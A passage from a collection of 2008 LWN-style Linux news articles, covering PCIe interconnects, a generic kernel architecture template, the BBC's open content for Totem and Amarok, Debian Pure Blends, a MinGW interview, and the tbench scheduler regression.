There are packages available for both 32 and 64-bit Fedora 8, 9 and
Ubuntu 7.10 (Gutsy), as well as 32-bit packages for openSUSE 10.3.
Unfortunately there is currently a bug in building 64-bit stldb4 on
openSUSE.  Install the libferris-suite package to pull in all the
dependencies.


Feel free to email the witme-ferris
mailing list or add comments to this article suggesting any weird and
wonderful (and obscure) filesystems you have experienced in the
past. Though my libferris.TODO file always grows more than it shrinks,
I'm always happy to add new and exciting suggestions near the top of
it.


		UKUUG: Arnd Bergmann on interconnecting with PCIe


PCI Express (PCIe) is not normally considered a way to connect
computers; rather, it is a bus for attaching peripherals. But there are
advantages to using it as an interconnect.  Kernel hacker Arnd Bergmann gave a
presentation at the recent UKUUG Linux 2008
conference on work he has been doing for IBM on using PCIe.  He
outlined the current state of Linux support as well as some plans for the
future.


The availability of PCIe endpoints for much of the hardware in use today is
one major advantage.  By using PCIe instead of other interconnects such as
InfiniBand, the same throughput can be achieved with lower latency and
power consumption.  Bergmann noted that avoiding a separate
InfiniBand chip saves 10-30 watts, which adds up rather quickly on a 30,000
node supercomputer.


There are some downsides to PCIe as well. There is no security model, for
example, so a root process on one machine can crash other connected machines.
There is also a single point of failure because if the PCIe root port goes
down, it takes the network with it or, as Bergmann puts it: "if
anything goes wrong, the whole system goes down".  PCIe lacks a
standard high-level interface for Linux and there is no generic code shared
between the various drivers—at least so far.


As an example of a system that uses PCIe, Bergmann described the
"Roadrunner" supercomputer that is currently the fastest in existence.  It
is a cluster of hybrid nodes, called "Triblades", each of which has one
Opteron blade along 
with two Cell blades.  The nodes are connected with
InfiniBand, but PCIe is used to communicate between the processors within
each node by using the Opteron root port and PCIe endpoints on the Cells. 


There is other hardware that uses PCIe in this way, including the Fixstars
GigaAccel 180 accelerator board and an embedded PowerPC 440/460
system-on-a-chip (SoC) board, both of which use the same Axon PCIe device.
Bergmann also talked about PCIe switches and non-transparent bridges that
perform the same 
kinds of functions as networking switches and bridges.  Bridges are called
"non-transparent" because they have I/O remapping tables—sometimes
IOMMUs—that can be addressed by the two root ports that are connected via
the bridge.  These bridges may also have DMA engines to facilitate data transfer
without host processor control.  


Bergmann then moved on to the software side of things, looking at the
drivers available—and planned—to support connection via PCIe.
The first driver was written by Mercury Computers in 2006 for a Cell
accelerator board and is now "abandonware".  It has many deficiencies and
would take a lot of work to get it into shape for the mainline.


Another choice is the driver used in the Roadrunner Triblade and the
GigaAccel device which is vaguely modeled on InfiniBand.  It has an
interface that uses custom ioctl() commands that implement just
eight operations, as opposed to hundreds for InfiniBand.  It is
"enormous for a Linux device driver", weighing in at 13,000
lines of code.  


The Triblade driver is not as portable as it could be, as it is very
specific to the Opteron and Cell architectures.  On the Cell side, it is
implemented as an Open Firmware driver, but the Opteron side is a PCIe
driver.  There is a lot of virtual ethernet code mixed in as well.
Overall, it is not seen as the best way forward to support these kinds of
devices in Linux.


Another approach was taken by a group of students sponsored by IBM who
developed a virtual ethernet prototype to talk to an IBM BladeCenter from a
workstation by way of a non-transparent bridge.  Each side could access
memory on the other by using ioremap() on one side and
dma_map_single() on the other.  By implementing a virtio driver,
they did not have to write an ethernet driver, as the virtio abstraction
provided that functionality.  The driver was a bit slow, as it didn't use
DMA, but it is a start down the road that Bergmann thinks should be taken.


He went on to describe a "conceptual driver" for PCIe endpoints that is
based on the students' work but adds on things like DMA as well as
additional virtio drivers.  Adding a virtio block device would allow
embedded devices to use hard disks over PCIe or, by implementing a Plan 9
filesystem (9pfs) virtio driver, individual files could be used directly
over PCIe.  All of this depends on using the virtio abstraction.


Virtio is seen as a useful layer in the driver because it is a standard
abstraction for "doing something when you aren't limited by
hardware".  Networking, block device, and filesystem "hosts" are all
implemented atop virtio drivers, which makes them available fairly easily.
One problem area, though, is the runtime configuration piece.  The problem
there is "not in coming up with something that works, but something that
will also work in the future".  


Replacing the ioctl() interface with the InfiniBand verbs (ibverb)
interface is planned.  The ibverb interface may not be the best choice in
an abstract sense, but it exists and supports OpenMPI, so the new driver
should implement it as well.


Two types of virtqueue implementations are envisioned, one for
memory-mapped I/O (MMIO) and the other for a DMA-based virtqueue.  The MMIO
would be the most basic virtqueue implementation, with a local read of a
remote write.  Read access on PCIe is much slower than write because a read
must flush all writes then wait for data reception.  Data and signaling
information would have separate areas so that data ordering guarantees
could be relaxed on the data area for better performance, while strict data
ordering would be set for the signaling area.


The DMA engine virtqueue implementation would be highly hardware-specific
to incorporate performance and other limitations of the underlying engine.
In some cases, for example, it is not worth setting up a DMA for transfers
of less than 2K, so copying via MMIO should be used instead.  DMA would be
used for transferring payload data, but signaling would still be handled
via MMIO.  Bergmann noted that the kernel DMA abstraction may not provide
all that is needed so enhancements to that interface may be required as
well.
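
The size-based choice between the two paths can be sketched in a few lines of C. This is only an illustration of the idea from the talk, not code from any driver: the names choose_xfer_method() and DMA_MIN_BYTES are hypothetical, and the 2048-byte cutoff is simply the "less than 2K" figure quoted above, which a real driver would tune for its DMA engine.

```c
#include <stddef.h>

/* Hypothetical cutoff taken from the "less than 2K" figure in the talk;
 * a real driver would pick this per DMA engine. */
#define DMA_MIN_BYTES 2048u

enum xfer_method {
    XFER_MMIO_COPY,   /* copy the payload through the memory-mapped window */
    XFER_DMA          /* program the DMA engine to move the payload */
};

/* Decide how to move a payload of len bytes.  Signaling is not covered
 * here because, per the talk, it would always go through MMIO. */
enum xfer_method choose_xfer_method(size_t len)
{
    return len < DMA_MIN_BYTES ? XFER_MMIO_COPY : XFER_DMA;
}
```

Under these assumptions a 64-byte control message would be copied through MMIO, while a 64KB buffer would be handed to the DMA engine.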


Bergmann did not provide any kind of time frame in which this work might
make its way into the kernel as it is a work in progress.  There is much
still to be done, but his presentation laid out a roadmap of where he
thinks it is headed.  


In a post-talk email exchange, Bergmann points to his triblade-2.6.27
branch for those interested in looking at the current state of affairs,
while noting that it "is only mildly related to what I think
we should be doing".  He also mentioned a patch by Ira Snyder that
implements virtual ethernet over PCI, which "is more
likely to go into the kernel in the near future".  Bergmann
and Snyder have agreed to join forces down the road to add more
functionality along the lines that were outlined in the talk.


		BBC opens a little more content for Linux


The British Broadcasting Corporation (BBC) has long dabbled with free
software, starting a number of new projects and opening content via their
backstage developer network. Now they've announced a bold new step forward,
releasing an experimental service (initially just for Linux users) with
open access to some multimedia content, which has
already spun out in unexpected ways.


The BBC's Research and Innovation
team followed a fairly conventional commissioning process for this
experiment. Having identified the feature (helping existing content to
"surface" in multimedia applications, so users don't need to browse around the
web site), they went on to find the right approach. George Wright and
his team
settled on integrating BBC content into the Totem media player with
Canonical, aiming to get a first version out with the recent Intrepid
release. Things then moved quickly. Discussions with the company contracted
to do the Totem work (Collabora) started in spring 2008, although according
to Christian Schaller from Collabora "it was probably around July
things got concrete". Over a few autumn months the work was
completed, opening up a large number of radio shows to Ubuntu users
worldwide (although much of the content is restricted to the UK because
that's who pays the TV license that funds the BBC). 


This great new feature, exclusive to Ubuntu, was promoted in the Intrepid
press release but received little attention in the media. Given that it still only
delivers a fraction of the content you can get through iPlayer (proprietary
Windows software full of DRM technology) this is hardly surprising. That
you can stream Dirac-encoded videos released under Creative Commons
licenses is obviously still a bit geeky for most. 


But that doesn't stop free software developers. Barely days after the Totem
announcement, Nikolaj Hald Nielsen wrote a script
to neatly integrate the content in Amarok 2.0. As a core Amarok developer
his main motivation was familiar: "I wanted to inspire other people
to write similar scripts for Amarok 2, and I think it is important to have
some good example scripts ready when Amarok 2.0.0 final is
released." I've been watching the Amarok 2 betas come along, and
having given the "get more features" dialogs in KDE a miss over the past
few years, I was pleasantly surprised how well this worked. You just go to
the script manager, click to get some more scripts, install the BBC script
and—like magic—you get all the BBC content in the "internet" tab on
the left. 


Wright's team did all the hard low-level work to make this kind of
adaptation straightforward. The Amarok script has delighted Wright, who is
a long-time Amarok user; they've even been in touch with Nielsen to see how
they can help improve the integration. 


The question everyone wants an answer to is: will this ever match iPlayer
for content range? Wright's team have a fairly wide remit, but they're not
in charge of releasing content, so this is unlikely to change the
Corporation's attitude towards DRM overnight. According to Wright, the
content teams have given great feedback, but over the past five years we've
seen promises of an open Creative Archive wither away, with a
consumer-facing focus on proprietary products like iPlayer. Truly open
content from the BBC, or even the volume of copyrighted-but-available
archives released by National Public Radio (NPR) in the US (also
integrated into Amarok), is probably still a long way off.


This new service is strictly experimental; Wright says "it's a way
to experiment with distribution platforms and free software."
They've also learned a lot more about developing in a free software
community; although many of them have been Linux users for years, this was
a first for them. Working to the feature freezes for GNOME and Ubuntu
Intrepid meant the UI isn't as nice as they might have hoped, but it's a
great start. 


The open service is here to stay. They're not sure if they'll keep
developing the Totem feature and patching against mainline in Ubuntu or
Totem; time will tell. More work between Collabora, the BBC, and Canonical
is also uncertain. But, since the code is all open, we can definitely expect
the Totem and Amarok features to be maintained. We can also look forward to
more open content integrated into free desktops in the future in a way
that is extremely difficult to do with proprietary platforms. 


		Blending Debian


Last week we introduced Debian Pure Blends,
and now this week we'd like to look a bit deeper into the concept, the
white paper and how this idea compares to similar ideas.

To begin with, the Debian Pure Blend is not a new idea.  It's a new name
for an existing concept that goes back to early 2004.  Discussions probably
started earlier, but April 2004 is when a mailing list was opened
for this topic.

At DebConf5, held in Helsinki, Finland in July of 2005, there were talks
about Debian Derivatives and Custom Debian
Distributions.  Custom Debian Distributions (CDD) was the previous name
for Debian Pure Blends and the derivatives are now forks.

A white paper, available in PDF or
HTML, was
originally written in 2004 to describe the CDD concept.  It has been
recently modified for the new name of Debian Pure Blends.

There are a few places in the white paper where its age shows.  These are
mostly references to distributions other than Debian.  You'll find some
mention of Mandrake, for example.  The merger of Mandrakesoft and Conectiva
that formed the new entity Mandriva was not finalized until 2005.  Debian 3.0
(Woody) appears to have been the stable version when the document was new.
Since then Debian has released 3.1 (Sarge) and 4.0 (Etch), and is nearing
the 5.0 release (Lenny).

While the dates are old, the whole stands as a definition of what is a Pure
Blend and what is a fork.  The Pure Blend is based on Debian stable
(currently Etch).  It contains only packages found in the stable
repository.  A Pure Blend must retain 100% compatibility with the stable
repository.  A system administrator using a Pure Blend could easily install
additional packages from Debian's sizeable repository.  It is not uncommon
for one or more developers of a Pure Blend to also be Debian Developers who
are able to maintain the packages needed by the Blend within the Debian
archive.  The document is also a valuable resource for anyone who wishes to
create their own Pure Blend.

The list of forks in section 5.1.1 could use some attention, although this
is not really important to the overall topic.  Currently listed are
Linspire, Xandros and Libranet.  Libranet died in 2006 following the death
of its founder Jon Danzig.  Linspire was acquired by Xandros earlier this
year and what was Linspire is now part of Xandros.  The free version of
Linspire, called Freespire, is still around.  Roughly speaking, Freespire
is to Xandros as Fedora is to Red Hat: a community project to test drive
new technologies which may find their way into the enterprise
distribution.

Whether Freespire is a fork or something more pure remains to be seen.
Freespire 5.0 is not finalized yet.  It appears that Freespire will wait
for the official Debian 5.0 (Lenny) release before its final 5.0 stable
release.

Another fork that might be mentioned here is Ubuntu.  This popular
distribution didn't exist when this document was originally created.  The
first Ubuntu release was 4.10 preview (Warty Warthog), dated September
2004.  Ubuntu is clearly a fork though, based on Debian's unstable branch,
known as sid.  Packages from Debian's stable repository might work on
Ubuntu, but that is by no means a sure thing.

So how does this compare to other distributions?  At this time Debian
remains the most popular base, whether the spinoff is Pure or a fork.  This
is largely due to the size of Debian's repository.  There are simply more
packages to choose from.  Fedora's repository has about half the number of
packages, but it continues to grow.  Fedora would like to become more
widely used as a base.  The project is still working on a draft of trademark
guidelines, where a "Spin" is much like a Pure Blend and a "Remix" is
more of a fork.  Spin maintainers are welcome to become Fedora contributors
and package the free software needed by the Spin.

Red Hat addressed this issue some years ago, when Red Hat Enterprise
spinoffs flourished following the demise of the old Red Hat Linux
distribution.  Red Hat made separate packages with its logos and trademark
so that spinoffs could more easily take the free software, without the
commercial baggage.  At first separating the logos from the free software
was a difficult process.  Debian has an official logo and an unofficial
logo, for other projects to use.  Fedora is coming up with its own rules,
with the draft
trademark guidelines.  The terminology for spinoffs varies as well.  A
Fedora Spin is mostly equivalent to a Debian Pure Blend.  A Fedora Remix is
more of a fork.

Regardless of what they are called, these spinoff distributions make the
free software landscape a richer and more diverse place.

		UKUUG: The right way to port Linux


Arnd Bergmann pulled double duty at the recent UKUUG Linux 2008
conference by giving a talk on each day of the event.  His talk on
Saturday, entitled "Porting Linux to a new architecture, the right way",
looked at various problems with recent architecture ports along with a
project he has been working on to simplify that process.  By creating a
generic template for architectures, some of the mistakes of the past can be
avoided. 


This is one of Bergmann's pet projects, that "I like to do for fun,
when I am hacking on the kernel, but not for IBM".  The project and
talk were inspired by a few new architectures that were merged—or
were submitted for merging—in the
last few years.  In particular, the Blackfin and MicroBlaze architectures
were inspiring, with the latter architecture still not merged, perhaps due
to Bergmann's comments.  He is hoping to help that situation get better.


The biggest problem with architecture ports tends to be code duplication
because people start by copying all of the files from an existing
architecture.  In addition, "most people who don't know what they are
doing copy from x86, which in my opinion is a big mistake".
According to Bergmann, architecture porters seem to "first copy the
header files and then change the whitespace", which makes it
difficult to immediately spot duplicated code.


He points to termbits.h as an example of an include file that is
duplicated in multiple architectures unnecessarily as the code is the same
in most cases.  He also notes there is "incorrect code
duplication", pointing to new architectures that implement the
sys_ipc() system call, resulting in "brand new architectures
supporting a broken interface for x86 UNIX from the 80s".  That call
is a de-multiplexer for System V IPC calls that has the
comment—dutifully duplicated into other architectures—"This is
really 
horribly ugly".
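
To make the "de-multiplexer" idea concrete, here is a small user-space sketch in C of what such an interface does: a single entry point receives a call number and fans it out to the individual System V IPC operations. This is not the kernel's code. The function name ipc_demux() is hypothetical, and the sub-call numbers and the masking of the high bits are written from memory of the kernel's linux/ipc.h and sys_ipc(), so they should be treated as assumptions.

```c
#include <stddef.h>

/* Sub-call numbers as recalled from <linux/ipc.h>; treat them as
 * assumptions rather than an authoritative list. */
enum {
    SEMOP = 1, SEMGET = 2, SEMCTL = 3,
    MSGSND = 11, MSGRCV = 12, MSGGET = 13, MSGCTL = 14,
    SHMAT = 21, SHMDT = 22, SHMGET = 23, SHMCTL = 24
};

/* Return the name of the operation selected by a multiplexed call
 * number, or NULL if the number is not recognized.  A real
 * implementation would call the matching handler instead. */
const char *ipc_demux(unsigned int call)
{
    call &= 0xffff;   /* assumed: high bits carry an interface version */

    switch (call) {
    case SEMOP:  return "semop";
    case SEMGET: return "semget";
    case SEMCTL: return "semctl";
    case MSGSND: return "msgsnd";
    case MSGRCV: return "msgrcv";
    case MSGGET: return "msgget";
    case MSGCTL: return "msgctl";
    case SHMAT:  return "shmat";
    case SHMDT:  return "shmdt";
    case SHMGET: return "shmget";
    case SHMCTL: return "shmctl";
    default:     return NULL;
    }
}
```

The alternative Bergmann appears to favor is giving each operation its own system call number, so that a new port never needs this extra layer of dispatch.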


Then there are problems with "code duplication by clueless
people" which 
includes a sembuf.h implementation that puts the padding in the
wrong place because of 64 vs. 32-bit confusion.  In addition, because
code is duplicated in multiple 
locations, bug fixes that are made for one architecture don't propagate to
all the places that need the fix.  As an example he noted a bug fix made by
Sparc maintainer David Miller in the x86 tree that didn't make it into the
Sparc tree.  Finally, there are ABIs that are being needlessly propagated
in new architecture ports: system calls that are implemented in terms
of newer calls are still present in new ports even though it could all be
handled in libc.


The "obvious" solution is to create a generic architecture implementation
that can be 
used as a starting point for new ports.  Bergmann has been working on that,
resulting in a 3000 line patch that "should make it very easy for
people to port to new architectures".   To start with, it defines a
canonical ABI that is a list of all of the system calls that need to be
implemented for a new architecture.  It puts all of the required include
files into the asm-generic directory that new ports can just
include—or copy if they need to modify them.   


Unfortunately, things are not quite that simple, of course; there are a number
of problem areas.  There are "lots of things you simply cannot do in
a generic way".  Most of these things are fairly hardware-specific
areas like MMU support, atomics, interrupts, task switching, byte order,
signal contexts, hardware probing and the like.


Bergmann decided to go ahead by defining away some of these problems in
his example architecture.  So, there is no SMP or MMU support with the
asm-generic/atomic.h and asm-generic/mmu_context.h
include files being appropriately modified.  Many of the
architecture-specific functions have been stubbed out in
arch/example/kernel/dummy.c so that he can compile the template
architecture. 


The example architecture uses an Open Firmware device tree to
describe the hardware that is available at boot time.  Open Firmware
"is a bit like what you have with the new Intel EFI firmware, but
it's a lot nicer".  A flattened device tree data structure is passed
to the kernel at boot time by the bootloader, so Bergmann will be able to make
it to the next step: making it boot.


As one might guess, there is still more work to be done.
There are eight header files that are needed from the
asm-example directory, but Bergmann hopes to reduce that some.  He
notes that there are other architecture-specific areas that need work.  For
example,
every single architecture has its own implementation of TCP
checksums in assembly language, which may not be optimal.
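
For comparison, a portable C version of the underlying calculation is short. The sketch below computes the 16-bit ones'-complement Internet checksum described in RFC 1071, which TCP applies to a pseudo-header plus the segment. It is not the kernel's implementation and makes no attempt at the per-architecture tuning the assembly versions aim for; the name inet_checksum() is chosen for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Compute the RFC 1071 Internet checksum over len bytes, reading the
 * data as big-endian 16-bit words.  The result is returned as a plain
 * number; the caller stores it in network byte order. */
uint16_t inet_checksum(const void *data, size_t len)
{
    assert(data != NULL || len == 0);

    const uint8_t *p = data;
    uint64_t sum = 0;   /* wide accumulator so long buffers cannot overflow */

    while (len > 1) {
        sum += ((uint32_t)p[0] << 8) | p[1];
        p += 2;
        len -= 2;
    }
    if (len == 1)       /* odd trailing byte is padded with a zero byte */
        sum += (uint32_t)p[0] << 8;

    /* Fold the carries back into the low 16 bits (end-around carry). */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);

    return (uint16_t)~sum;
}
```

Run over the eight bytes 00 01 f2 03 f4 f5 f6 f7, the sample data used in RFC 1071, the folded sum is 0xddf2 and the function returns its complement, 0x220d.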


Bergmann pointed attendees at the ukuug2008 branch of his
kernel.org playground git tree: git://git.kernel.org/pub/scm/linux/kernel/git/arnd/playground.git
to see the current state of his example architecture.  It looks to be a
nice addition to the kernel that will likely result in better architecture
ports down the road.


		MinGW and why Linux users should care


The Minimalist GNU for Windows (MinGW)
project is a way to get GCC and tools like binutils working to build
software for the
Windows environment—something that might not sound very interesting
to Linux users or developers.  But there are a number of
advantages to porting and 
regularly testing free software on Windows, as Red Hat's Richard Jones and
Dan Berrange explain in the following interview.   Richard and Dan also
describe Red Hat's involvement, how developers can
participate, as well as how it all helps the free software cause.


LWN: Could you describe the MinGW project?  How did it get started?


Richard: For some time I have been making Windows builds of libvirt
available and, frankly, it was a real chore.  I
needed a Windows virtual machine to do it.  But Windows is so
frustrating to use and maintain: it doesn't come with any of the tools
such as shells or version control that we are used to, and because I
was only doing builds once a month or so I'd go back to it and find
something had gone wrong that would require maintenance or even
reinstallation.

During this time, we didn't routinely build libvirt for Windows.  New
code would inevitably break something.  I had to fix things on
Windows, then copy the code back to Linux and check that my fixes
didn't break the Linux build, then come up with a patch, and all of
this was complicated by the fundamental incompatibility of Windows
with the rest of the world -- even simply copying code back and forth
is irritatingly difficult when one machine is a Windows machine.
(There's no ssh or scp or tar, files get executable bits set or have
CRLF line endings, etc.)

At the same time we were getting a strong demand for the rest of our
virt tools on Windows.  Enough was
enough.
We decided that the only way to deal with this was to remove Windows
from the equation.  We wanted to build and test libvirt and the virt
tools for Windows routinely (daily or more often), from the Fedora
host, using the normal development environment.  The way to do this is
through cross-compilation (the Fedora MinGW project) and testing under
emulation (Wine).

Debian & Ubuntu have been shipping the MinGW cross-compiler for quite
a while, but it's important to say that the cross-compiler itself is
the easy bit.  The hard part of this project is the 50+ libraries
and development tools that we ship and maintain alongside.  Without
those, just having the cross-compiler is fairly useless.


Dan: The libvirt project started a few years ago to provide an API
for managing Xen virtualization hosts. Initially it was just a locally
accessed C library, but over time the project expanded in scope to
allow remote RPC access to the management APIs, and to cover other
virtualization technologies like QEMU, KVM, OpenVZ, LXC (native Linux
containers) & User-Mode Linux. Shortly after we added support for RPC, a
number of community members expressed an interest in using the client
side from the Windows platform to manage their Unix hosts.
Periodically people would contribute patches to make libvirt build on
Windows, but soon after they were applied, new unrelated work would
break the Windows build again.

It became clear that if the libvirt community was to officially
support building a Windows client, then all developers needed to
be able to easily test builds for Windows. The obvious stumbling
block here is that most of our community developers do not use or
even own Windows machines for testing. The MinGW project provides
a cross compiler toolchain and stubs for the Win32 APIs to allow
building of Windows executables and DLLs from a Linux host. Add
in WINE and you can also run your cross-compiled build. MinGW and
WINE are completely open source, so we can provide a very good
level of support without ever having to purchase a Windows license
or leave our primary Linux development environment.

We are not the first people to see the value in MinGW for supporting
Windows platforms in open source software. Prior to the start
of the Fedora MinGW effort, Fedora developers would have to build all
the cross compilers & libraries themselves. This is not particularly
hard, but it is a lot of wasted effort to have everyone duplicating
the work. Providing the MinGW compiler toolchain, and important
libraries such as libxml, gnutls, libpng, libjpeg, GLib, GTK, etc
directly in the Fedora repositories enables developers to focus on
their own code, rather than the cross-compilers.


LWN: What is Red Hat's involvement in MinGW?


Richard: Dan and I work for a Red
Hat group responsible for fostering the 
development of new tools and technologies.  We
have an eye to productisation and I spend quite a lot of time going to
customer conferences and asking them what they want to see, but as for
whether MinGW will make it into some future supported Red Hat product
I cannot say.

Dan: Red Hat initiated development on the libvirt project and
supports its ongoing evolution with significant developer
resources. Red Hat wants the libvirt project to be the de facto
standard for managing virtualization hosts, and the project community
members want Windows to be a supported client platform. The work we
are doing on the MinGW project in Fedora is thus a response to demand
from the libvirt community for better Windows support in our
releases. It is just a small part of our day job, alongside major
libvirt feature development for Linux systems and in particular KVM &
Xen.


LWN: Why does Red Hat care?  Are you going into the Windows software
  business now?


Richard: Red Hat certainly cares about libvirt, and making libvirt
available on the widest range of platforms.  The alternatives to
libvirt are interfaces like XenAPI and VMWare's APIs, which lock
customers into proprietary technologies.  Any way we can make it
easier to provide open APIs and open source software even on closed
platforms like Windows is a win for Red Hat, the Linux community,
and even for Windows users.

Dan: As Richard says, this effort isn't about any particular Red Hat
product. It is a community focused effort to address demand from
libvirt users for better Windows client support. People are interested
in open source virtualization technology like Xen and KVM, as an
alternative to closed source solutions. Open source exists in a
heterogeneous world though, and even if someone decides to migrate their
servers to virtual machines on a Linux KVM host, they may still need
to manage these servers from a Windows desktop. The MinGW project
helps us maintain a reliable client build for the Windows platform,
and thus lets a broader spectrum of users take advantage of open
source virtualization technology. Growing the size of the libvirt
community, and encouraging use of virtualization is what is important
to Red Hat, and the MinGW project is one small part of that effort.


LWN: Why should free software developers care about MinGW?  Does it do
  anything for them?


Richard: There's been some opposition, along the lines of "why are we
helping Windows?".  IMHO people who say that are ignoring both history
and reality.  First the history bit: the GNU project started off as a
set of better compilers and command-line tools for the proprietary
Unix systems of the day.  I remember before Linux was around that
you'd get some horrible system like HP-UX or (in my case) OS-9, and
the first thing you would do would be to install all the GNU tools.
Without real GNU grep, make, awk, bash, those systems were less than
useful.  Eventually when GNU got a kernel (Linux) we moved over to
that system because it came with all the good tools.

Second the reality bit: Windows users are locked into proprietary
applications and file formats, everything from Photoshop to QuickBooks
to MSN to Illustrator.  No Windows user can switch without first
switching all their applications, which is going to be a very long
transition process.  Therefore we need a way to enable the developers
of Gimp, GnuCash, Pidgin, Inkscape (to pick four out of hundreds) to
easily build and test their software for Windows, so they can ship
their software for Windows, respond easily to bug reports, and break
that proprietary lock-in.  Fedora MinGW does this - in fact we already
used our compiler and huge chain of libraries to port
Inkscape. 


Dan: The libvirt project started off with a strong Linux focus due
to our immediate needs for a management API for Xen in Fedora and
later RHEL-5. Over time the community has contributed patches to
improve our portability to non-Linux platforms, in particular Solaris
and more recently Windows. While Red Hat's focus is on Linux, enabling
portability to other platforms is important because it grows the size
of your developer community. Every significant open source project has
a huge wishlist of features and nowhere near enough developers and
testers to address them all. Cross-platform portability enlarges the
pool of potential contributors. They may initially only send minor
patches to fix portability bugs for Windows, but over time they can
end up working on major new features that benefit every platform.

Another thing we've found in porting to other platforms, is that it
can generally improve the quality of the codebase. Different compilers
and runtime environments expose different bugs in an application. The
more combinations you can regularly build & test on, the better the
overall quality of your code.


LWN: Is there anything in particular that developers should keep in mind to
  make life easier for people building their code for MinGW?


Richard: My pet list would be:


 Don't write your own build system.  Use autoconf/automake/libtool
   or cmake.  That's not to say I'm a great fan of autoconf, but
   these really do make cross-compilation almost trivial.

   Autoconf-based programs can generally be cross-compiled by doing:


 Don't try to run executables during the build phase.  It doesn't
   work when you're cross-compiling.


 Do use pkg-config.  And if you can't use pkg-config, then make sure
   your *-config program is a shell script, not a binary.


 Do use common, portable libraries such as glib, gtk, libvirt or
   any of our 
   other libraries.


 Please use Fedora MinGW to routinely cross-compile your own code
   for Windows.


Dan: I have been pleasantly surprised at just how easy it has been to
build many open source libraries with MinGW. Despite almost universal
dislike for autotools, the applications which use autotools have been
some of the easiest to port, particularly when it comes to building
DLLs. The apps with home-brewed build systems have been much more
involved. I definitely echo Richard's suggestion to stick to a broadly
supported build system like autotools or cmake.

Any project which is serious about enabling support for Windows in
their releases should make sure they are running regular automated
builds & tests of their codebase. This is actually just good sense
for any software engineering project regardless of whether Windows
support is desired - it just happens to be particularly useful for
configurations that developers rarely test on a day-to-day basis
to avoid otherwise unnoticed regressions.

If you are not using a support library like GLib, Qt or NSPR (which
provides a degree of cross-platform portability) then seriously
consider making use of Gnulib. This is a library of
code which you 
can drop into an application, fixing POSIX API portability problems
on various platforms. As an example, it replaces Winsock's socket()
call so it returns real file descriptors that you can use in both
read() and recvfrom(). It can't fix all problems - such as the lack
of fork()/exec() on Windows - but if your application / library
is written against POSIX, using Gnulib will significantly improve
your portability across all Linux, UNIX and Windows platforms.


LWN: What are the biggest challenges that your project faces now?  How can
  the community help?


Richard: Scaling the project is a big challenge.  Red Hat dedicates quite
limited resources to this project.  The only way we can scale it is if
the application developers themselves start to use our tools to build
and maintain their own programs.  I would like to see everyone who has
an important Linux app or library start building and shipping for
Windows routinely.  Bringing open APIs, apps and file formats to
Windows users is important: It's important to Windows users because it
breaks their lock-in and makes switching to a fully free platform
easier down the road.  It's important for you, because your potential
audience of users will increase by a factor of 10x or 20x.

Dan: Spreading the package maintenance job across a larger number
of Fedora members is an important task. There is a limit to how many
packages a single person can do a good job at maintaining. To make
it manageable we track & pull patches from the native builds to the
MinGW cross-compiled builds of common packages. Ultimately we still
need more package maintainers to look after the cross-compiled builds.

There are some core pieces of the open source ecosystem which do not
work / are not fully portable to a Win32 environment. The most obvious
one being DBus, which is used by an ever increasing number of apps
for local RPC. There have been a number of efforts to port DBus, but
none ever completely finished & merged into the official releases.


LWN: Anything else you'd like to say to LWN readers?


Richard: Get
involved. 

Dan: Cross platform portability is often beneficial to your project
even if you personally only care about its use in Linux. In the libvirt
case it is opening up use of libvirt & virtualization to a set of
users who have only ever had access to closed source virtualization
technology. Portability broadens the pool of potential contributors to
your project. Open source developers on the various BSDs, OpenSolaris,
and Windows all have the potential to make valuable contributions to
your project.


[ We would like to thank Richard and Dan for taking time to answer our
questions. ]

		Tbench troubles II


LWN has previously covered
concerns over slowly deteriorating performance by current Linux systems on
the network- and scheduler-heavy tbench benchmark.  Tbench runs have been
getting worse since roughly 2.6.22.  At the end of the last episode,
attention had been directed toward the CFS scheduler as the presumptive
culprit.  That article concluded with the suggestion that, now that
attention had been focused on the scheduler's role in the tbench
performance regression, fixes would be relatively quick in coming.  One
month later, it
would appear that those fixes have indeed come, and that developers looking
for better tbench results will need to cast their gaze beyond the
scheduler.


The discussion resumed after a routine weekly posting of the post-2.6.26
regression list; one entry in that list is
the tbench performance issue.  Ingo Molnar responded to that posting with a pointer to an
extensive set of benchmark runs done by Mike Galbraith.  The conclusion
Ingo draws from all those runs is that the CFS scheduler is now faster than
the old O(1) scheduler, and that "all scheduler components of this
regression have been eliminated."  Beyond that:


	In fact his numbers show that scheduler speedups since 2.6.22 have
	offset and hidden most other sources of tbench
	regression. (i.e. the scheduler portion got 5% faster, hence it was
	able to offset a slowdown of 5% in other areas of the kernel that
	tbench triggers)


This improvement is not something that just happened; it is the result of a
focused effort on the part of the scheduler developers.  Quite a few
changes have been merged; they all seem like small tweaks, but, together,
they add up to substantial improvements in scheduler performance.
One
change fixes a spot where the scheduler code disabled interrupts
needlessly.  Some others (here
and here)
adjust the scheduler's "wakeup buddy" mechanism, a feature which ties
processes together in the scheduler's view.  As an example, consider a
process which wakes up a second process, then runs out of its allocated
time on the CPU.  The wakeup buddy system will cause the scheduler to bias
its selection mechanism to favor the just-waked process, on the theory that
said process will be consuming cache-warm data created by the waking
process.  By allowing cooperating processes like this to run slightly ahead
of what a strictly fair scheduling algorithm would provide, the scheduler
gets better performance out of the system as a whole.

The recent changes add a "backward buddy" concept.  If there is no recently-waked
process to switch to, the scheduler will, instead, bias the selection
toward the process which was preempted to enable the outgoing process to
run.  Chances are relatively good that the preempted process (1) is
cooperating with the outgoing process or (2) has some
data still in cache - or both.  So running that process next is likely to
yield better performance overall.

A number of other small changes have been merged, to the point that the
scheduler developers think that the tbench regressions are no longer their
problem.  Networking maintainer David Miller has disagreed with this assessment, though,
claiming that performance problems still exist in the scheduler.  Ingo responded
in a couple of ways, starting with the posting of some profiling results which show very little
scheduler overhead.  Interestingly, it turns out that the networking
developers get different results from their profiling runs than the
scheduler developers do.  And that, in turn, is a result of the different
hardware that they are using for their work.  Ingo has a bleeding-edge
Intel processor to play with; the networking folks have processors which
are not quite so new.  David Miller tends to run on SPARC processors, which
may be adding unique problems of their own.

The other thing Ingo did was, for all practical purposes, to profile the
entire kernel code path involved in a tbench run, then to disassemble
the executable and examine the profile results on a per-instruction basis.
The postings that resulted (example) point
out a number of potential problem spots, most of which are in the
networking code.  Some of those have already been fixed, while others are
being disputed.  It is, in the end, a large amount of raw data which is
likely to inspire discussion for a while.

To an outsider, this whole affair can have the look of an ongoing
finger-pointing exercise.  And, perhaps, that's what it is.  But it's
highly technical finger-pointing which has increased the understanding of
how the kernel responds to a specific type of stress while also
demonstrating the limits of some of our measurement tools and the
